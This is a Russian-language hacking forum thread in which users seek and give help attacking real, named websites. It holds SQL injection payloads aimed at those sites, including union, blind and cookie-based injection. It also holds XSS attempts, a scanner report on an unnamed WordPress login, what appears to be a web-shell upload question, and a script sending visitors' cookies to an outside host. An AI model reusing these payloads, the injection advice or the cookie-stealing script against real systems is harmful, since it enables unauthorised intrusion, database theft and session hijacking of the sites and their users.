увы, вывода нет. Code: http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+
Вот жеж беда =(( Для посимвольного перебора тогда получается так: http://www.heritage.am/ru/component...*/+and+substring((select+version()),1,1)=5--+ ? Это ведь Joomla, стандартная таблица jos_users?
Почему когда пробую отправить файл через форму <form action="www.site.ru" method=post enctype=multipart/form-data> <input type=file name=file size=40> <input type=submit value=Загрузить> </form> ссылка преобразуется так www.site.ru/?file=dk.php и файл или картинка не запускается,просто обычную страницу грузит
начните с азов. html это язык разметки, а не язык программирования. через него вы не сможете залить файл
------------------------------------------------------------------------------------------------------------------------------------------------- Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to 'http://www.site.ru/p1/dk.php' in /home/u941469589/public_html/upload.php on line 12 ------------------------------------------------------------------------------------------------------------------------------------------------- сама форма ------------------------------------------------------------------------------------------------------------------------------------------------- <form action="http://pro100gul.tioo.ru/upload.php" method="post" enctype="multipart/form-data"> <input type="file" name="filename"><br> <input type="submit" value="Загрузить"><br> </form> ------------------------------------------------------------------------------------------------------------------------------------------------- сам upload.php ------------------------------------------------------------------------------------------------------------------------------------------------- <?php if($_FILES["filename"]["size"] > 1024*3*1024) { echo ("Размер файла превышает три мегабайта"); exit; } // Проверяем загружен ли файл if(is_uploaded_file($_FILES["filename"]["tmp_name"])) { // Если файл загружен успешно, перемещаем его // из временной директории в конечную move_uploaded_file($_FILES["filename"]["tmp_name"], "http://www.site.ru/p1/".$_FILES["filename"]["name"]); } else { echo("Ошибка загрузки файла"); } ?> -------------------------------------------------------------------------------------------------------------------------------------------------
Spoiler: Инфа которая поможет Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь Сведения об уязвимости обнаружено, что данные пароля передаются через HTTP. влияние Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей. Действия, чтобы Взять См средство для решения. Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP. средство Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS. Форма цель действия : http://*******.ru/wp-login.php . Сайт я не скажу естественно . Дак вот что мне нужно сделать? . Есть HTML код страницы Spoiler <html style="border:none">?<!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="ru-RU"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="ru-RU"> <!--<![endif]--> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>******.ru › Войти</title> <link rel='stylesheet' id='open-sans-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&subset=latin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext&ver=4.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='http://*******.ru/wp-includes/css/dashicons.min.css?ver=4.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='wp-admin-css' href='http://*******.ru/wp-admin/css/wp-admin.min.css?ver=4.0.5' type='text/css' media='all' /> <link rel='stylesheet' id='buttons-css' href='http://*******.ru/wp-includes/css/buttons.min.css?ver=4.0.5' type='text/css' media='all' /> <!--[if lte IE 7]> <link rel='stylesheet' id='ie-css' href='http://*******.ru/wp-admin/css/ie.min.css?ver=4.0.5' type='text/css' media='all' /> <![endif]--> <meta name='robots' content='noindex,follow' /> </head> <body class="login login-action-login wp-core-ui" style="background-color:#000000;"> <center> <div id="login"> <h1> <!-- <a href="http://wordpress.org/" title="Сайт работает на WordPress">*******.ru</a> --> </h1> <a href="http://*******.ru/"><img src="http://www.*******.ru/img/logo_helpset.png" border="0" width="209"></a> <center> <form name="loginform" id="loginform" action="http://*******.ru/wp-login.php" method="post"> <p> <label for="user_login">Имя пользователя<br /> <input type="text" name="log" id="user_login" class="input" value="" size="20" /></label> </p> <p> <label for="user_pass">Пароль<br /> <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> Запомнить меня</label></p> <p class="submit"> <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Войти" /> <input type="hidden" name="redirect_to" value="http://*******.ru/wp-admin/post.php?action=edit&post={post-id}" /> <input type="hidden" name="testcookie" value="1" /> </p> </form> </center> <p id="nav"> <a href="http://*******.ru/wp-login.php?action=register">Регистрация</a> | <a href="http://*******.ru/wp-login.php?action=lostpassword" title="Восстановление пароля">Забыли пароль?</a> </p> <script type="text/javascript"> function wp_attempt_focus(){ setTimeout( function(){ try{ d = document.getElementById('user_login'); d.focus(); d.select(); } catch(e){} }, 200); } wp_attempt_focus(); if(typeof wpOnload=='function')wpOnload(); </script> <center> <!--LiveInternet counter--><script type="text/javascript">document.write("<a href='http://www.liveinternet.ru/click' target=_blank><img src='//counter.yadro.ru/hit?t44.1;r" + escape(top.document.referrer) + ((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ";u" + escape(document.URL) + ";" + Math.random() + "' border=0 width=31 height=31 alt='' title='LiveInternet'><\/a>")</script><!--/LiveInternet--> </center> <p id="backtoblog"><a href="http://www.*******.ru/" title="Потерялись?">← Назад к сайту «*******.ru»</a></p> </div> <div class="clear"></div> </center> </body> </html> Не знаю поможет ли это : GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpost-id%257D&reauth=1 HTTP/1.1 Cache-Control: no-cache Referer: http://*****.ru/wp-admin/post.php?action=edit&post={post-id} Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker Accept-Language: en-us,en;q=0.5 X-Scanner: ****** Host: ****.ru Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d0b01c3be92e0d0d Accept-Encoding: gzip, deflate --------------------------------------------------------------------------------------- robots.txt : User-agent: * Disallow: /cgi-bin/ Disallow: /wp-admin/ Allow: /doc/ Allow: /img/ Allow: /wp-content/uploads/ ------------------------------------------- Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly. HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . ) влияние Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы. Действия, чтобы Взять См средство для решения. Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье). средство Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты. Внешние ссылки Как это сделать ? . ----------------------------------------------------------------------------------- Url http://*******.ru/wp-login.php?action=lostpassword Identified Field Name user_login . Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы. Это были важные поля, такие как "кредитная карта". Влияние Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта. Действия, чтобы Взять Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей. Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется. Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно. Требуемые навыки для успешной эксплуатации Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения. Внешние ссылки Использование автозаполнения в HTML форм П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей . ----------------------------------------------------------------------- Url http://*******.ru/crossdomain.xml Правила политики <позволяют-доступа из домена = "*" к портам = "80" /> Классификация Классификация OWASP 2010 A6 OWASP 2013 А5 КВО 16 WASC 15 Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики. влияние Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений. средство Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену. Внешние ссылки Рекомендации по использованию файла политики кросс-доменных для Flash Player Crossdomain.xml приглашает Cross-Site Mayhem . Как это сделать? [/spoiler=Инфа которая поможет]
https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep Spoiler: POST Host: www.polyvinylrecords.com User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+union+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHTZEY5EYCVTEEGZ%3A20150708%3A1 Connection: keep-alive Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
1. логины пароли идут не через SSL 2. у кук нет свойства httpOnly 3. crossdomain.xml: читать тут https://forum.antichat.ru/threads/300591/
Помогите с выводом: https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+order+by+9+--+ https://www.ibethel.org/payments/co...e_idr=144'+and+substring(@@version,1,1)=5+--+
в таких случаях через blind парсите select info from information_schema.processlist и смотрите, почему так и как можно получить вывод
Иньекция в переменную JavaScript Здравствуйте, подскажите, почему не выполняется alert: Code: http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPoAFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKkDxz3zZHTsR-u1N6ySOikXD104RF&search=1 Вывод: Code: 'searchText': '\\'}; Alert(/Xss/);///*', ----------------------------------------------------------------------------------- Похожая проблема у меня и вот с этой xss: Code: http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid= Вывод: Code: pageLog["q"] = "\\\";alert();//";
ну вот в этом случае экранируется ' и вы не выходите за пределы значения параметра, соответственно все воспринимается как текст(значение параметра)
все верно. однако alert() у вас с большой буквы, такой функции нет. а во втором случае вы как раз не выходите за пределы кавычек, там же их три - \\\"
http://www.sawadee.com/lib6/gmap/gmap3_aj.php?lg=en&q=tyfghfjjjjjjjgty') Что нибудь интересненькое сделать можно?
Что это? http://4cheat.ru/admincp/ единственное что там интересует дак токо это throttlepostsadmin.php . При переходе кидает сюда http://4cheat.ru/admincp/throttlepostsadmin.php . Но там тупо постое окно . Что делать? .
Можно ли скрипт <script>img = new Image(); img.src = "http://qoo.by/3aG?"+document.cookie;</script> укоротить до 45 символов ?